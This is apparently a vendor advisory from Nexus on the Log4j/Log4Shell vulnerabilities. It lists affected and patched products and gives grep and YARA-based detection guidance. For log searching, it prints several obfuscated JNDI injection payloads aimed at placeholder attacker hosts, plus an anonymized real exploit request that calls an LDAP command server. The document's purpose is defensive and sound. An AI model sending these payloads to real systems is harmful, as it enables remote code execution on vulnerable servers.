Log4J / Log4Shell Vulnerability information
General information
This article contains information related to the remote code execution (RCE) vulnerability affecting Log4j: https://www.randori.com/blog/cve-2021-44228/
Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers. According to public sources, Chen Zhaojun of Alibaba officially reported a Log4j2 remote code execution (RCE) vulnerability to Apache on Nov. 24, 2021.
This critical vulnerability, subsequently tracked as CVE-2021-44228 (aka “Log4Shell”), impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1.
Subsequently, two additional CVEs were reported for Log4j: CVE-2021-45046, affecting version 2.15, and CVE-2021-45105, affecting version 2.16.
The Nexus Security team has investigated the Log4j remote code execution vulnerabilities (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105) and their possible impact on our products.
Information about the update
Refer to the table in section "Nexus components" for the latest information for the components.
CVE-2021-45105
A new vulnerability (CVE-2021-45105) was detected in Log4j and has been fixed in Log4j 2.17. Nexus has investigated the issue, and currently we see no indication that Nexus products are affected by this vulnerability.
Customers who still want to update to the latest Log4j version 2.17, can download the corresponding version from the official Log4j website, and replace the version 2.16 JAR file with the new one.
Nexus will update Log4j again with the next regular release of the corresponding product versions.
Releases with fixed versions of the affected components:
Smart ID version 21.10.2 – This version is packaged with Log4j 2.17.1.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.2
Smart ID version 21.10.1 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.1
Smart ID version 21.04.7 – This version is packaged with Log4j 2.17.1.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.7
Smart ID version 21.04.6 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.6
Smart ID version 20.11.4 – This version is packaged with Log4j 2.17.1.
You can find this version on the support portal, and release notes here: Release note Smart ID 20.11.4
Smart ID version 20.11.3 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID 20.11.3
Digital Access version 6.1.2 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, and it is packaged with Log4j 2.17.
You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.2
Digital Access version 6.1.1 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.1
Smart ID Identity Manager (PRIME) version 3.12.14 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.12.14
Smart ID Identity Manager (PRIME) version 3.11.5 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.11.5
Smart ID Identity Manager (PRIME) version 3.10.32 – This version is packaged with Log4j 2.17.1.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.32
Smart ID Identity Manager (PRIME) version 3.10.30 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.30
Nexus SaaS customers
If you are a Nexus SaaS (Software as a Service) customer, the mitigation and patching is performed by the SaaS delivery team. Our SaaS services are monitored 24/7/365 by our on-call rotation, and we have also updated our monitoring and routines to deal with this specific CVE.
Nexus components
This list contains the components from Nexus, and their respective affected versions.
Component | Affected versions | Comment |
---|---|---|
Smart ID Certificate Manager | None of the supported versions are affected | Does not use Log4j |
Nexus OCSP Responder | None of the supported versions are affected | Does not use Log4j |
Nexus Timestamp Server | None of the supported versions are affected | Does not use Log4j |
Smart ID Desktop / Mobile App | None of the supported versions are affected | Does not use Log4j |
Nexus Card SDK | None of the supported versions are affected | Does not use Log4j |
Smart ID Physical Access | None of the supported versions are affected | Does not use Log4j |
Smart ID Digital Access (previously named Hybrid Access Gateway – HAG) | Versions 6.0.5 and later could be affected if customers have configured Digital Access to use a syslog server for logging. | Versions < 6.0.5 are not affected. All versions of HAG are not affected. |
Smart ID Identity Manager / PRIME | EOL WAR versions: | Recommendation is to implement mitigation as described below, or upgrade. |
Smart ID Self-Service | Supported WAR versions: 3.9 20.06 | Recommendation is to implement mitigation as described below, until Nexus has provided an official fix. |
Smart ID Messaging component - Hermod | None of the supported versions are affected | Hermod is shipped with the Log4j framework, in this case log4j-api, which is not affected. Hermod uses Logback for its logging, not Log4j. See reference in documentation: Link and: Link |
If you have made any customized adaptations to your own logging, you need to investigate this with your teams internally. The information in this list is based on how Nexus ships its released versions to you.
Mitigation
Patch using the latest available version from Nexus, as specified above.
For temporary mitigations, we recommend that you refer to Apache's public documentation for each specific CVE: https://logging.apache.org/log4j/2.x/security.html
Further information
As an additional recommendation, we highly encourage you to investigate all other application servers (non-Nexus software) you might have that could use Log4j.
We also encourage you to perform log analysis of your application and network traffic and to take appropriate steps for mitigation.
This list contains some of the known applications that could be vulnerable to this CVE:
Apache Struts
Apache Solr
Apache Druid
Apache Flink
ElasticSearch
Flume
Apache Dubbo
Logstash
Kafka
Spring-Boot-starter-log4j2
Log4j RCE exploitation detection
You can use these commands and rules to search for exploitation attempts against the Log4j RCE vulnerability CVE-2021-44228.
The commands below are examples; you will need to point them at your respective application log folder.
Nexus does not have access to the systems hosted by you, the customer (except for Nexus SaaS services, where this is handled by the service organization), so it is vital that you perform your own investigations to make sure that you have not been breached and are not subject to any form of data breach.
Grep / Zgrep
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log
This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'
Grep / Zgrep - Obfuscated variants
These commands also cover the obfuscated variants, but the file name is not included in a match.
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:
sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;
This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:
sudo find /var/log/ -name "*.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;
Yara file
YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of VirusTotal and is mainly used in malware research and detection. It was developed with the idea of describing patterns that identify particular strains or entire families of malware.
On this GitHub page, you can find a YARA file that is tailor-made for this CVE (CVE-2021-44228).
Credit for the grep commands and YARA files goes to Neo23x0 / Florian Roth. We share these with you under the Detection Rule License (DRL) 1.1.
WAF bypass methods
Many WAF (Web Application Firewall) vendors and providers have implemented WAF rules to be able to stop the traffic before it can reach the application itself.
There are methods to bypass some of the WAF rules. Below are some examples of such methods that we encourage you to search for in your logs, to see whether your WAF might have missed these requests.
Note: asdasd and xxxxxx are only examples; in a real scenario this will be the attacker's URL.
Example
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
This is an example of how this could look in an application log (real request, anonymized):
2021-12-12 05:54:07 0 ip.number.ip.ip 5f7288ab7f41d805 - - - endpoint.ip.number:443 https - GET / ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://111.111.1111.111:12344/Basic/Command/Base64/V2Ugd291bGQgbm90IHBvc3QgYW55dGhpbmcgbWFsaWNpb3VzIGhlcmUsIHNvIHRoaXMgaXMganVzdCBhbiBleGFtcGxlIHRleHQgY29udmVydGVkIHRvIEJBU0U2NCA6KQ== } host:ip.number.ip.ip:443 404
Disclaimer
Nexus has made every effort to make this information accurate and reliable. However, the information, including the recommendations provided by Nexus, is provided "as is" without warranty of any kind. Nexus disclaims all warranties, either expressed or implied, and Nexus shall in no event be liable for any damages whatsoever, including direct, indirect, incidental, consequential, loss of business profits or special damages, which may arise as a result of your use of, or inability to use, this information.
Latest update date of this article
2022-03-04